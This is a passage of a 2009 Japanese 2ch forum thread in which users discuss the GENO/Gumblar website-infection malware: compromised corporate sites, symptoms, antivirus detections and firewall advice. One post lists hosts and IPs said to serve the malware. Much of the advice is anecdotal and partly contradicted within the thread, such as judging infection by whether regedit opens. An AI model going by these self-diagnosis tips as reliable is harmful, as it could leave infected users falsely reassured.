一応元がfirefoxのお気に入りからという事がわかってるからあんまり気にしてないんだけど
今回の件と関係あるかな?
713:名無しさん@お腹いっぱい。
09/05/15 03:58:19
>>711
上に出ていた方法で調べました
どうしよう orz
714:名無しさん@お腹いっぱい。
09/05/15 03:58:26
>>712
spybotスレに似たような報告があったと思うが
誤検出っぽいよ
715:名無しさん@お腹いっぱい。
09/05/15 03:58:28
とりあえず、ウィルスの作者を見つけ出して逮捕してくれ。
以前もこんな感じのことがあったよな。
その時は犯人が逮捕されたけれど。
勿論、外国で外国人が逮捕されたわけだがな。
被害が世界中に及ぶから性質が悪い。
716:名無しさん@お腹いっぱい。
09/05/15 04:00:34
>>591
>本物そっくりの「Flash Player」偽サイト出現、目的はウイルス配布:ITpro
>URLリンク(itpro.nikkeibp.co.jp)
の
>このプログラムをウイルスだと判定したのは14製品だけだった
この14製品を書かないと記事として片手落ちだろう。つーか知りたい。
多分ノートン先生は失格だろうなあ。
717:名無しさん@お腹いっぱい。
09/05/15 04:00:41
ここまで危険なウイルスっていままでにあった?
知り合いが感染していたよ。
まじやばい。
718:名無しさん@お腹いっぱい。
09/05/15 04:03:33
ニフティのオンラインスキャンしたけど感染してなくてほっとした。
バスター2009いれてて、URLフィルタもフィッシングブロックも有効にしてるけど
XPだから油断できないな…
firefoxでも危険なんだよなコレ?
うかつにネサフできねーじゃん…
719:名無しさん@お腹いっぱい。
09/05/15 04:04:34
>>714
ええ、そうなの?
実は2回に分けて検出されたんだよね
1回目は500個ぐらいで
2回目は300個ぐらい
そんで全部修正して3回目には見つからなくなったけど
何それじゃspybotがfirefoxのお気に入りを誤検出してたということか
thx
720:名無しさん@お腹いっぱい。
09/05/15 04:05:39
感染したかどうかがわからんが
ニコニコみてたら(クリックした時)IEがよく固まるな。
つーか、発見から3ヶ月くらいたってない?
いまだ解決策はおろか、判別法も無しかよw
721:名無しさん@お腹いっぱい。
09/05/15 04:06:19
sqlsodbc.chmはとりあえず改ざんされてない場合の場所に
ファイル名実行できた
AVASTがキャッシュ隔離したしカスペとスパイボットとAVAST
スキャンで感染0だったからもう寝るヽ(`Д´)ノ
722:名無しさん@お腹いっぱい。
09/05/15 04:06:40
>>610
気象庁のレーダーとかアメダスとかな。
Operaとかだとサイト毎に設定できるんだが
今回のは気象庁のサイトだって汚染される可能性もあるしいやはや・・
723:名無しさん@お腹いっぱい。
09/05/15 04:07:04
発見から3ヶ月もたってるのか?これ。
さっきブログではじめて知ったよ。
どこかで報道されていないの?
724:名無しさん@お腹いっぱい。
09/05/15 04:08:15
>>720
genoで見つかったのが4月最初くらいじゃなかったか?だから1ヵ月半くらいだと思う
genoより前から話題になってたらわからんけど
725:名無しさん@お腹いっぱい。
09/05/15 04:08:35
システムの復元は無意味?
726:名無しさん@お腹いっぱい。
09/05/15 04:10:22
>>725
クリンインスコをおすすめ
システムそのものを書き換えます
727:名無しさん@お腹いっぱい。
09/05/15 04:10:42
>>725
感染したんならクリーンインストール以外は意味ないよ
728:名無しさん@お腹いっぱい。
09/05/15 04:10:46
4月に楽天のスレでGENO感染楽天店舗対応最悪で
プチ祭があったけど我が身に這い寄ってくるとは
おもなんだナイアルラトホテプ
729:名無しさん@お腹いっぱい。
09/05/15 04:12:05
>>727
はっきりと感染ってどうやったら判明するのか
明確な基準ないよな
730:名無しさん@お腹いっぱい。
09/05/15 04:13:18
>>724
1ヶ月半なら、もっとニュースになっていてもいいよね?
検索してみても個人のページしか出てこないや
731:名無しさん@お腹いっぱい。
09/05/15 04:15:54
感染したら、クリーンインストールするしかない
って言うけどさ、そもそも感染しているのかどうか判別できないんだけど?
感染の有無を判定する方法って何か無いの?
732:名無しさん@お腹いっぱい。
09/05/15 04:16:02
GENOウイルス大活躍だな、なんでこんなにすごいんだ?
733:名無しさん@お腹いっぱい。
09/05/15 04:16:16
>>718
IEよりはだいぶましだが油断は禁物
734:名無しさん@お腹いっぱい。
09/05/15 04:17:23
>>731
過去スレ、ちゃんと見たか?
完璧な判定方法がないからやべえんだよ、こいつは。
735:名無しさん@お腹いっぱい。
09/05/15 04:17:36
とりあえず、avastでチェックかけたら大丈夫だった
あと、ニフティのオンラインスキャンで大丈夫なら感染してないって判断で良いのかな?
736:名無しさん@お腹いっぱい。
09/05/15 04:20:40
現状だと、セキュリティーソフト入れていても、次々と新種が出てきて対応できない
感じ?
どこのサイトで感染するか分からないという恐ろしい事態だな
(((( ;゚Д゚)))ガクガクブルブル
737:名無しさん@お腹いっぱい。
09/05/15 04:21:01
URLリンク(www3.atword.jp)
こちらを見るとすごおおおおおおおくまずそうなのですが
この予感は当たっていますか?
NTTが感染しているなんて、信じられないのですが
738:名無しさん@お腹いっぱい。
09/05/15 04:22:52
>>736
その通り
こいつは狙いやすい環境(IE)をチェックして感染しているのがたちが悪い
739:名無しさん@お腹いっぱい。
09/05/15 04:24:55
>>736
んな感じ
とりあえず既にいろいろ言われてる対策はしておいたほうがいいとはおもう
>>737
そこはむしろ見ておいたほうが良いと思う。
心配ならまとめページのトップからもリンク張られてるし確認するといい
740:名無しさん@お腹いっぱい。
09/05/15 04:25:07
Adobe Readerってアンインストールしてもいいんですか?
741:名無しさん@お腹いっぱい。
09/05/15 04:25:56
>>740
使わないんならいいんじゃね?
不便だけどさw
742:名無しさん@お腹いっぱい。
09/05/15 04:27:41
>>741
このウィルス知ってから何もかも恐る恐るって感じなんですよ・・・
とりあえず滅多に使わないんで消しときました
レスありがとうございます
743:名無しさん@お腹いっぱい。
09/05/15 04:27:46
ウイルスバスター終わったので寝ます orz
明日みんなに連絡しなくちゃ…
みなさんもお気を付けて
744:名無しさん@お腹いっぱい。
09/05/15 04:29:10
>>717
7年ぐらい前かNimdaの騒ぎは凄かったな。
NHKの7時のニュースでもトップ扱いだったかな。
745:名無しさん@お腹いっぱい。
09/05/15 04:30:27
てかニフティで検索するのに
ニフティ感染してるの????
746:名無しさん@お腹いっぱい。
09/05/15 04:31:09
>>745
( ゚Д゚)
何だと・・・?
747:名無しさん@お腹いっぱい。
09/05/15 04:31:11
>>737
もう一体何が起こってるのかさっぱりなんだが・・・
大塚製薬とSayMoveのほかにNTTまで感染してんの??
748:名無しさん@お腹いっぱい。
09/05/15 04:34:45
>>746
前のレスにも出てるけど
URLリンク(www3.atword.jp)
のサイトにかいてある
SAKURAインターネットさん
www1722.sakura.ne.jp
sv172.lolipop.jp
sv11.chicappa.jp
株式会社 PURENIC JAPAN さん
p09ns7.puretopure.jp
NTTコミュニケーションズさん
120.29.185.234(VPS-TOKYO2)
ニフティサーブ ネットワーク(ニフティ株式会社さん
61.121.100.119
の該当データの停止を行ってください。
何度Mail送っても反応無いので・・・・・
749:名無しさん@お腹いっぱい。
09/05/15 04:37:17
>>745
マジかよ
さっきオンラインスキャンやってきたばっかだぞorz
早く寝てしまいたい…
750:名無しさん@お腹いっぱい。
09/05/15 04:38:08
ニフティにアクセスしたらアウトなの?
751:名無しさん@お腹いっぱい。
09/05/15 04:38:45
ニフティのセキュリティ情報サイトさっき見たばかりなんd
752:名無しさん@お腹いっぱい。
09/05/15 04:39:44
マジでヤバイなこれw
753:名無しさん@お腹いっぱい。
09/05/15 04:39:58
ニフティ今朝アクセスしたばっかり・・・。うwぁああああああああああああああ
754:名無しさん@お腹いっぱい。
09/05/15 04:40:48
けどコマンドプロンプトもレジストリエディタも普通に立ち上がったぞ
IEの挙動もなんともない
CPU使用率もいたって普通
755:名無しさん@お腹いっぱい。
09/05/15 04:41:27
>>196
これって何をスキャンしたの?
ローカルに保存したファイルしかスキャンできないと思っていたんだけど、違うのか?
756:名無しさん@お腹いっぱい。
09/05/15 04:42:09
一気に感染拡大してるじゃん。しばらく安心してネット出来ないなこりゃ
757:名無しさん@お腹いっぱい。
09/05/15 04:44:31
ニフティマジかよスキャンするためにわざわざIEでJS有効にしたのに・・・
758:名無しさん@お腹いっぱい。
09/05/15 04:44:34
専ブラで2ch見るぶんには大丈夫だよね?
759:名無しさん@お腹いっぱい。
09/05/15 04:44:54
avast反応よさそうなのでインスコしたらBeckyでメール受信出来なくなった
アンインスコした
760:名無しさん@お腹いっぱい。
09/05/15 04:45:23
>>754
IEの挙動は元々おかしい(WinMeなので・・・)んだけど、
MS-DOSプロンプトとレジストリエディタは立ち上がった
一応、感染してないってことで良いのかな?
761:名無しさん@お腹いっぱい。
09/05/15 04:45:38
これて桜とかニフティでサーバーかりてる一部の感染じゃないの?
762:名無しさん@お腹いっぱい。
09/05/15 04:48:06
>>754
CPU使用率は元から100%な件・・・
763:名無しさん@お腹いっぱい。
09/05/15 04:48:39
ニフティなんてスキャンするために何度も行ってるが
764:名無しさん@お腹いっぱい。
09/05/15 04:50:17
もう疑心暗鬼になってるなw
よくあるパターンだw
765:名無しさん@お腹いっぱい。
09/05/15 04:52:57
怖くて再起動/シャットダウンできないwww
寝たいよー
766:名無しさん@お腹いっぱい。
09/05/15 04:53:58
ウインドウズアップデートしたら重すぎて怖い
767:名無しさん@お腹いっぱい。
09/05/15 04:54:39
>>765
休止はダメなのか
768:名無しさん@お腹いっぱい。
09/05/15 04:55:19
どうせサイトなんか持ってないし、挙動もおかしくないし、
(感染してるかどうかわかんないけど)騒動落ち着いてからOS入れなおそうかなw
何かもうアホらしくなってきたw
769:名無しさん@お腹いっぱい。
09/05/15 04:57:53
www.nifty.comとはIPアドレスが違うから落ち着け
770:名無しさん@お腹いっぱい。
09/05/15 05:00:09
あやしいURLを開こうとしたらウィルス対策ソフトって警告とか出ますかね
771:名無しさん@お腹いっぱい。
09/05/15 05:00:27
>>765
俺もシャットダウン&再起動できんわw
シャットダウンしたら最後、起動できなくなりそうでw
バックアップも取ってないし、終わったわ・・・
アダルトサイト見ていたわけでもないのに、何でウイルスに出くわすんだよ
772:名無しさん@お腹いっぱい。
09/05/15 05:01:47
>>770
俺はavastでページ開く前に警告出たんだけど、何故かウイルスチェストに移動できなくて
果たして感染防止できたのか、感染してしまったのか判断できずに困ってる・・・
773:名無しさん@お腹いっぱい。
09/05/15 05:02:57
>>772
挙動がおかしくなければ多分大丈夫
774:765
09/05/15 05:03:09
よっしゃ、勇気を出して(ヤケクソで)再起動したけど
またここに戻ってこれたよおおおおおお
>>769ありがとねw
775:名無しさん@お腹いっぱい。
09/05/15 05:03:35
>>772
まずはすぐに確認できるもの(regeditとか)だけ確認してみれば?
776:名無しさん@お腹いっぱい。
09/05/15 05:04:15
>>771
案外アダルトサイトの方がウイルス対策や改竄対策をしっかりやっていて却って安心だったりして。
777:名無しさん@お腹いっぱい。
09/05/15 05:05:08
これって感染したらすぐわかるもんなの?コマンドプロンプトやレジストリエディタなんて、普段はあんまり使わないし
特定のサイトに繋がらない、ブラウザが落ちるっていうのも何も知らない人だったら「ちょっと調子悪いなぁ」くらいにしか思わないんじゃ・・・。
778:名無しさん@お腹いっぱい。
09/05/15 05:06:33
これだけ広まってれば大々的な対策されるのも時間の問題だよな、流石に
そうであってほしい
779:名無しさん@お腹いっぱい。
09/05/15 05:06:45
>>773
Meのせいか、普段から挙動がおかしいので分からんw
>>775
とりあえず、MS-DOSプロンプトとregeditは起動できた
大丈夫なのかな?
>>776
それは言えてるw
意外とアダルトサイトってウイルスいないよねw
780:名無しさん@お腹いっぱい。
09/05/15 05:07:23
>>760
Meってとっくにセキュリティー関連の更新が終わっているんじゃないの?
脆弱性の検査もされずに放置され、トロイとかの餌食になってると思うけど。
持っていないから、詳しくは知らんけど。
781:名無しさん@お腹いっぱい。
09/05/15 05:07:40
Meは今んとこ感染報告ないからのう…
782:名無しさん@お腹いっぱい。
09/05/15 05:09:01
>>780
2,3年前にサービス停止したね
でも、俺のPCはMeがOSなので、仕方が無く使ってるわ・・・
一応、Meでもavast入れていれば大丈夫だよね?
今回も警告出てくれたし
783:名無しさん@お腹いっぱい。
09/05/15 05:09:42
GENOはどこからウィルスもらってきたわけ
784:名無しさん@お腹いっぱい。
09/05/15 05:09:55
>>782
いや例えこのウイルスはブロックできてもそれ以外で問題山積みだから
窓から投げ捨てて安物のネットブックでも買って来い
785:名無しさん@お腹いっぱい。
09/05/15 05:12:17
>>784
今日、電気屋に行って、PC物色して来たよ
OS(XP)がインストール済みのノートで5万5千くらいだったな
786:名無しさん@お腹いっぱい。
09/05/15 05:13:37
Meは古すぎる、つまりネット絡みが貧弱なので
落とされる脆弱性はあっても乗っ取られる要素は2000よりも少ないと何かで読んだことがある。
98SEからXPに移行したクチなのでMeは良く分からないな。
787:名無しさん@お腹いっぱい。
09/05/15 05:15:09
安いPCを探そうと思ったけど通販サイトや情報サイト覗くのが怖い件w
788:名無しさん@お腹いっぱい。
09/05/15 05:16:39
>>782
古いOS 脆弱性
でぐぐったら、トップにこれが出てきた。
熟読した方がいいと思う。
URLリンク(blog.hitachi-system.co.jp)
詳しくは知らないけど、MEを使ってるのは、AdobeReaderの9.10以前を使っているよりも危険だと思う。
avastがウィルスの侵入を食い止めてくれても、脆弱性をついた攻撃をガードできるわけじゃないはず。
そもそも、セキュリティーメーカー側からしたら、時系列が逆だし。
789:名無しさん@お腹いっぱい。
09/05/15 05:21:27
Windowsが狙われたとは言えmacを使う気になれないのはどうしてだろう。
790:名無しさん@お腹いっぱい。
09/05/15 05:23:22
このウィルスの話題って外じゃ全然でてこないけど
かなりやばくないか
791:名無しさん@お腹いっぱい。
09/05/15 05:27:01
2ch内でもそこまで騒ぎになってないよな
苺きんたまの時とかの方がみんな騒いでた
セキュリティソフトを過信して安心しきってるってことかな
792:名無しさん@お腹いっぱい。
09/05/15 05:27:59
>>790
大きい企業もやられているので圧力が・・・
個人情報も抜かれてるなんて知られた日には初心者はパニックになるよな。
793:名無しさん@お腹いっぱい。
09/05/15 05:32:54
4月の半ばになんかのサイト見ようとリンク押したら警告でたなぁ
もしかしたらこのウィルスかもしれん
794:名無しさん@お腹いっぱい。
09/05/15 05:44:18
アドビのサイト開こうとするとブラウザが固まる
FireFoxならいけたんだけど何でだ
795:名無しさん@お腹いっぱい。
09/05/15 05:47:15
小林製薬のサイトよく見てたから怖くなってきた…
796:名無しさん@お腹いっぱい。
09/05/15 06:58:25
61.121.100.119って
hXXp://homepage.nifty.com/
のサーバーのIPアドレスか?
797:名無しさん@お腹いっぱい。
09/05/15 07:01:28
なるほどwww.nifty.com行っても反応ないのか
798:名無しさん@お腹いっぱい。
09/05/15 07:03:38
見に行ったら表示されないなあ
799:名無しさん@お腹いっぱい。
09/05/15 07:08:42
再起動したけど、とりあえず普通に立ち上がったわ
CPU使用率も問題ないし、regeditも起動できた
感染してないってことでOK?
800:名無しさん@お腹いっぱい。
09/05/15 07:16:39
Nimdaは感染経路がいくつもあったからある意味「責任逃れ」ができたんだけど、
GENOウイルスはサイト管理者のPCが感染→そこからFTPを通してサイトが改ざん→
そのサイトにアクセスすることで感染、と経路(つまり責任)がはっきりしているから
「お前のせいで感染したんだ!どうしてくれる!」「怖いからもうそこでは買わない、
それどころかそのサイトに行きたくもない」と企業や個人の責任問題にされかねない
801:名無しさん@お腹いっぱい。
09/05/15 07:21:05
aguse.jpが全然役に立たない理由が↓見てわかったわ。
URLリンク(ilion.blog47.fc2.com)
jscript.dllのバージョンを調べて、本当にIEで表示してるのかを確認してるから、
UAを偽装してアクセスしても検出されないんだ。
スクリプトの難読化パターンも多いし、シグネチャベースの検知はかなり難しいね。
オンラインスキャンもほとんど無意味だし、avast入れておくのがいちばんかも。
とりあえずIEを使わないってだけでも、現時点では効果があるけど、改変版でも
大丈夫かどうかわからないし。
802:名無しさん@お腹いっぱい。
09/05/15 07:22:49
ノートン無反応か・・・早く対応すればいいのに
803:名無しさん@お腹いっぱい。
09/05/15 07:58:08
2009/5/14 22:39 - 小林製薬 (4967) は12日、同社のホームページが何者かによって改ざんされ、
ホームページにアクセスするとウィルスに感染するようになっていたとして、
ウィルス感染が判明したホームページを当面の間、閉鎖したことを発表した。
同社によると感染が明らかになったホームページは
「暮らしのヒントお知らせ隊(URLリンク(hint.kobayashi.co.jp))」「ハナノアブランドサイト(URLリンク(hint.kobayashi.co.jp))」
「イージーファイバーブランドサイト(URLリンク(hint.kobayashi.co.jp)) 」の3つ。
それぞれ、5月9日5時27分から5月11日21日27分までこれらのホームページにアクセスした人は、
ウィルスに感染した可能性があるとして、感染の有無を確認するように呼びかけている。
ウィルスに感染した場合、sqlsodbc.chmの改変、コマンドプロンプトが起動不能、レジストリエディタが起動不能などの症状が発生するとしている。
尚、同社ではMacとWindows Vistaに関してはこのウィルスには感染する恐れはないとも述べている。
URLリンク(www.technobahn.com)
804:名無しさん@お腹いっぱい。
09/05/15 08:00:29
>同社のホームページが何者かによって改ざんされ
805:名無しさん@お腹いっぱい。
09/05/15 08:07:57
aguseは、GENO祭りの真っ最中もまったく役立たずだったな。
何度調べさせてもセフセフ。
806:名無しさん@お腹いっぱい。
09/05/15 08:08:06
GDATA(avast)は対応済みか、、、後常にJSを切ってる人
807:名無しさん@お腹いっぱい。
09/05/15 08:12:09
↑見たらJSあっても無くても感染するのか。
808:名無しさん@お腹いっぱい。
09/05/15 08:14:06
フラッシュプレイヨー10って小数点以下の違いある?
アドビリーダー9.10と9.11みたいな違い。
809:名無しさん@お腹いっぱい。
09/05/15 08:15:49
違いがないのに数だけ増やしてると思ってるの?
810:名無しさん@お腹いっぱい。
09/05/15 08:15:59
>>805
zlkonやgumblarがアクセス制御かけて同じホストからの接続には
しばらく(?)無害になるのでサーバーサイドのチェッカの類はほぼ効かない
(初回は有害判定されるかもしれんけど、たぶんJScript.dllチェックで蹴られておしまい)。
NortonSafeWebもセーフ判定のまま。
811:名無しさん@お腹いっぱい。
09/05/15 08:26:25
>>803
確認して感染が見つかったらどう責任とってくれるんだよwww
812:名無しさん@お腹いっぱい。
09/05/15 08:27:17
>>803
>同社のホームページが何者かによって改ざんされ
w
813:名無しさん@お腹いっぱい。
09/05/15 08:29:28
GENOにくらべたら対応がいいほう
814:名無しさん@お腹いっぱい。
09/05/15 08:30:48
アンチウィルスのパターンファイルもアテにならないし、ヒューリスティック頼みだな。
そのヒューリスティックもAvast!以外は無力みたいだし、Avast!も亜種すべてに
反応するかわからんし、困ったもんだな。
JavaScriptの埋め込みによるリダイレクトじゃなくて、hrefタグを書き換えるような
形になってしまったらAvast!も反応しないんじゃないかな?
815:名無しさん@お腹いっぱい。
09/05/15 08:30:57
>>809
そうじゃなくて10にも種類があるのか知りたい。
前に10にしたけど知らない間に新しいの出てると困る。
816:名無しさん@お腹いっぱい。
09/05/15 08:33:42
>>815
FLASH バージョン でググって最新版か確認汁
817:名無しさん@お腹いっぱい。
09/05/15 08:34:08
>>815
Acrobat ReaderなりAcrobatなりを立ち上げて、ヘルプメニューの「アップデートの有無をチェック」
してみればいいよ。インストールされているAdobe製品全般のアップデート確認が行われるから。
818:名無しさん@お腹いっぱい。
09/05/15 08:35:54
>>809の突っ込み方はないわなw
819:名無しさん@お腹いっぱい。
09/05/15 08:36:58
>>817
それ、なぜかFlashは対象になってない気がする。Reader、Acrobat、PhotoShop等は
アップデートされるんだけどね。
820:名無しさん@お腹いっぱい。
09/05/15 08:41:05
まぁFlashPlayerはそれ単体で起動するものではなくブラウザから呼ばれる物だからね。
IEならFlash置いてあるサイト管理者がobjectタグにバージョン書いとけばそれ以下ならIEに更新を促される。
821:名無しさん@お腹いっぱい。
09/05/15 08:41:44
何が目的かわからんが、現在の最新版と今自分が使ってる版を確認したければここを開け
URLリンク(www.adobe.com)
822:名無しさん@お腹いっぱい。
09/05/15 08:42:49
>>819
Flashはここで見れるよ
823:名無しさん@お腹いっぱい。
09/05/15 08:43:12
>>814
やっぱ、avastって凄いのか?
824:822
09/05/15 08:43:37
貼り忘れた org
URLリンク(www.adobe.com)
825:822
09/05/15 08:44:18
orz (^^;
826:名無しさん@お腹いっぱい。
09/05/15 08:46:12
有料のノートンとかバスターより無料のavastが凄いとか、どういうことよ?
827:名無しさん@お腹いっぱい。
09/05/15 08:46:18
JAVAスクリプトのソースに、ノートンのオートプロテクトは反応しないのか
828:名無しさん@お腹いっぱい。
09/05/15 08:48:29
>>823
Genoに関してはね。
過剰に反応することも多いし、FWやアンチスパイウェアとも組み合わせなければ
いけないから、PCにあまり詳しくない人には勧めにくいんだよな。
家族が使ってるPCのセキュリティソフト、どうすっかな。
829:名無しさん@お腹いっぱい。
09/05/15 08:48:48
バスターは元々無料のより使えないけどな
830:名無しさん@お腹いっぱい。
09/05/15 08:50:45
>>827
しないね。難読化パターンがいろいろあるし。
831:名無しさん@お腹いっぱい。
09/05/15 08:52:42
このウイルスの怖さを周りや上司にいっても
「ふーん」で終わって、ちゃんとupdateの確認さえしたかも怪しい。。
これが普通なのかな、ちゃんと説明した自分が空しい。。
832:名無しさん@お腹いっぱい。
09/05/15 09:00:41
>>828
俺、avast単独で使ってるんだけどダメなのか?
833:名無しさん@お腹いっぱい。
09/05/15 09:02:47
俺のところも、前回のラトビアの規制だけして、adobeのバージョンアップはなし。
業務に影響を及ぼしうるadobeのバージョンアップは許可できないんだそうでw
業務用バスターw入れてるから大丈夫とか、もうアボガドバナナと。
834:名無しさん@お腹いっぱい。
09/05/15 09:04:04
>>815
URLリンク(www.adobe.com)
日本のサイトはアップデートが遅い。
最新じゃないのに、最新といってくる。
>>832
FWは入れたほうがいいのでは?
コマンドプロンプトやレジストリ起動不可能っていう情報も、ミスリードさせるSE攻撃かもな。
835:名無しさん@お腹いっぱい。
09/05/15 09:05:13
>>832
FWはルータの内側で使ってるならなくてもいいかもね。
Avast!単体だとマルウェアやスパイウェアの類はスルーされる可能性があるから
入れておいた方がいいと思う。
836:名無しさん@お腹いっぱい。
09/05/15 09:06:58
Avast+UAC+WindowsFWが手軽でわりと安全
837:名無しさん@お腹いっぱい。
09/05/15 09:16:44
>>835
ルータ(ホームゲートウェイ)の内側で使用してるわ
FW(ファイアウォール)って、ルータとかで外部のインターネットと
隔絶されている環境(LANとか)ならもう入っているんでしょ?
838:名無しさん@お腹いっぱい。
09/05/15 09:22:49
>>837
ルータにはポート、プロトコルベースのFW機能はあるけど、自分で設定しなければ
ザルだよ。標準状態ではTeredoが通過しちゃうものも多いし。
839:名無しさん@お腹いっぱい。
09/05/15 09:29:49
本物のウィルスより怖いわ
バックアップとっておくかな
840:名無しさん@お腹いっぱい。
09/05/15 09:35:07
IDがでないから、誰が何を書いているのか分からんな。
>>837
使っているOSは?
ルーターが仮に100パーセント外部からの攻撃は防げたとしても、
内側からのリクエストはスルーするからね。
ブラウザでリンク先をクリックすれば、
ルータに遮断されずに次のページの(外部)情報がローカルに戻ってくるのと同じ方法で
悪さをされないともいえない。
PCに入ったマルウェアが外部に情報を送ったりってのを防げる確立が減る。
FW入れてても、IEとかに偽装されて通信されるんだから、入れたほうが良いよ。
フリー HIPS Firewall OR ファイアーウォール
でググルんだ。
841:名無しさん@お腹いっぱい。
09/05/15 09:40:50
>>840
OSはWinMe
FWってルーターの内側でも別個に入れておかないとダメなもんなの?
俺はavast入れておいたから、もう大丈夫だと思ってたよ
セキュリティソフトってファイアウォールの役割もあるんじゃないの?
842:名無しさん@お腹いっぱい。
09/05/15 09:42:12
Meなんか捨てろ
843:名無しさん@お腹いっぱい。
09/05/15 09:56:02
>>842
2004年に中古PCを買ったとき、プリインストールされていたんだよ
まだ5年しか使ってないんだぞ?ネットゲームとかしない限りは、普通に
ブラウザでHPも閲覧できるし・・・特に問題はないんだが
たった、5年で捨てるとか、買い換えるとか、車とかTV,冷蔵庫じゃありえん
844:名無しさん@お腹いっぱい。
09/05/15 09:57:16
知り合いは言っても無駄だから全部人柱、観察対象でオケ。
845:613
09/05/15 09:57:37
>>614-615
ありがとう、調べてみる
846:840
09/05/15 09:57:41
>>841
>FWってルーターの内側でも別個に入れておかないとダメなもんなの?
だから、入れておかないとダメって言ってるじゃん。
>>779と同じ人?
はっきり言って、君のような人がボットネットやマルウェア拡散の踏み台になっているんだよ。
>>779-788
は読んだ?
avastはFW入ってないでしょ?
ウィルス対策とファイアーウォールは別。
ノートンとかウィルスバスターはFWも統合されているけど、ウィルス対策だけを抜き出している製品もある。
avastは抜き出された方と同種であり、セキュリティーの一部を担っているだけ。
ルーターも初期設定で使ってそうだな。 ルーターだと思っていたが、実はモデムだったってオチすらありそうだ。
847:名無しさん@お腹いっぱい。
09/05/15 10:01:21
何か色々あったが3日で直った、多分このウイルスの現象
1、とりあえずIEが満足に使用できなくなる
IEの再インストール?上書き?でとりあえず直る
2、公式ログイン制のオンラインゲームが起動しなくなる
どうやらパスワードの認識が通らなくなる様子、何故通らなくなるのかは知らん
avastのアップデートが出来なかったり、エアーステーションに接続できなくなったり等
3、cmdが使えなくなる、色々方法を探してたときに気づいた
結局cmdは使ってないけどな、復元ポイント早速作っておいたわ
とりあえずスパイウェア削除してavast起動したらシステムメモリ内にウイルス混入してたっぽく
再起動後にスキャンするとか言うのをやったら直ったっぽい
848:名無しさん@お腹いっぱい。
09/05/15 10:03:37
>>846
ルーターであることは確かだよ
光回線だし、モデムだけじゃなくてホームゲートウェイで
インターネットに接続しているから
ただ、初期設定の状態で使っていることは確かだな
ルーターの設定を勝手に弄って、変な設定に変えたらまずいし
とりあえず、もう少ししたらXPのインストールされたPCに買い換えようと考えている
849:名無しさん@お腹いっぱい。
09/05/15 10:04:54
>>848
7にしておこうよ?
850:名無しさん@お腹いっぱい。
09/05/15 10:05:02
>>847
何でその時点の復元ポイント作るんだよwww
悪いことは言わんからOS再インストールしてメール等、思いつくもののパスワード全部変更しとけ。
851:名無しさん@お腹いっぱい。
09/05/15 10:05:47
そうそう、何かの雑誌で「セキュリティソフトは1個だけインストールするのが基本で
複数のソフトを入れると競合が起きてまずい」って書いてあったんだよ
だから、俺はavast一本にして、他のFWとかも一切入れなかったんだ
852:名無しさん@お腹いっぱい。
09/05/15 10:08:38
avastはFW入ってないから競合しようがないと思うが、することあるん?
853:名無しさん@お腹いっぱい。
09/05/15 10:22:19
FWもセキュリティソフトの一種だから、競合起こしたらまずいと思っていたんだが・・・
854:名無しさん@お腹いっぱい。
09/05/15 10:23:56
>>851
それはノートンとかの話でしょ?
それにお前はavastにFWが搭載されていると思っていたんだろうが。
>>849
一刻を争う時に半年後の話をしてどうする。
855:名無しさん@お腹いっぱい。
09/05/15 10:23:57
>>852
対策されてるかわからんが、一昔前はある事もあったよ。
FW単体のほかにウイルススキャンのソフトもやってる会社だったから、他社製品に対して意図的に競合起こしてんじゃねえの?
って言われたりしてた。
856:名無しさん@お腹いっぱい。
09/05/15 10:25:08
もう1回ニフ見てくるか
857:名無しさん@お腹いっぱい。
09/05/15 10:26:42
>>843
中古で買った日から起算して5年とかバカなの?
MEはその名のとおり2000年、前世紀(20世紀)の遺物で
2004年当時はXPに対してSP2が出ている。
おまけに10年前だろうと去年だろうと車やVTや冷蔵庫の性能は大して変わらんが
PCの能力やそれを取り巻く環境(ネット等のインフラ、その利便性と脅威)は
大幅に変わるんだよ。XPSP2もBlasterやSasserの猛威があって
日本中の郵便局でCDを配っただろ。
MEは現時点であらゆるサポートが切られている。
858:名無しさん@お腹いっぱい。
09/05/15 10:27:10
>>855
そうなんだ、㌧
859:名無しさん@お腹いっぱい。
09/05/15 10:29:00
XP使ってるんだがカスペオンスキャンで感染見つからなければセーフ?
860:名無しさん@お腹いっぱい。
09/05/15 10:31:23
Meが何の略かとかさっぱり忘れてたぜ
861:名無しさん@お腹いっぱい。
09/05/15 10:32:05
つーかよく9x系未だ使ってられるよな。
システムリソース気にしながら作業なんて
もう考えたくねえ
862:名無しさん@お腹いっぱい。
09/05/15 10:35:30
>>854
> >>849
> 一刻を争う時に半年後の話をしてどうする。
だってこれからXP買おうとしてる人にVISTA勧めるのもなぁ
863:名無しさん@お腹いっぱい。
09/05/15 10:36:12
ニフもGENOも問題なくなってるのか
馬は警報きた
864:名無しさん@お腹いっぱい。
09/05/15 10:37:37
夏過ぎに7にアップグレードできるVISTA搭載機は出るとは思うが、
この馬鹿は懲りずに中古買いそうだ。
865:名無しさん@お腹いっぱい。
09/05/15 10:47:42
>>843
>たった、5年で捨てるとか、買い換えるとか、車とかTV,冷蔵庫じゃありえん
Windows Meは車検切れ。
製造のMicrosoftしか車検はできず
そのMicrosoftがWindows Meはもう車検しませんと言っている。
866:名無しさん@お腹いっぱい。
09/05/15 11:01:02
>>747
大塚製薬に謝れ!!
867:名無しさん@お腹いっぱい。
09/05/15 11:04:05
まあPCは特殊分野だからねえ
F1マシンに例えると今期のマシンが最高速度300km/hだったのが来期は600km/h
その翌年には1200km/hになってるようなもの
ちょっとおかしな世界なのよマジで
868:名無しさん@お腹いっぱい。
09/05/15 11:04:51
>>863
馬て何?
869:名無しさん@お腹いっぱい。
09/05/15 11:08:12
>>748
NTTだけ反応するなあ
870:名無しさん@お腹いっぱい。
09/05/15 11:12:59
この程度ならVista UACを使うまでもなく、ルーター+Win2k+で問題ないでしょ。
871:名無しさん@お腹いっぱい。
09/05/15 11:14:46
>>868
トロイ奴だなw
872:名無しさん@お腹いっぱい。
09/05/15 11:21:05
>>871
あ、なるほどw
873:名無しさん@お腹いっぱい。
09/05/15 11:30:40
>>843
世界が違うんだよ。家電と。解らないならパソコン辞めろ
874:名無しさん@お腹いっぱい。
09/05/15 11:40:35
>>870
そうだな
Vistaは誰でも簡単にセキュリティが保てるようにしただけの物だから上級者なら2000でも十分だな
ただ2000のアップデートももうじき終わるのが痛いな
875:名無しさん@お腹いっぱい。
09/05/15 11:42:55
>>847
おいおいw
ある日莫大な請求がいってもしらんぞ
876:名無しさん@お腹いっぱい。
09/05/15 11:44:53
XPのサポートっていつまで続くの?
877:名無しさん@お腹いっぱい。
09/05/15 11:46:07
2014年まで
878:名無しさん@お腹いっぱい。
09/05/15 11:48:11
Windows2000やXPでセキュリティを保つよりVista以上のOSに
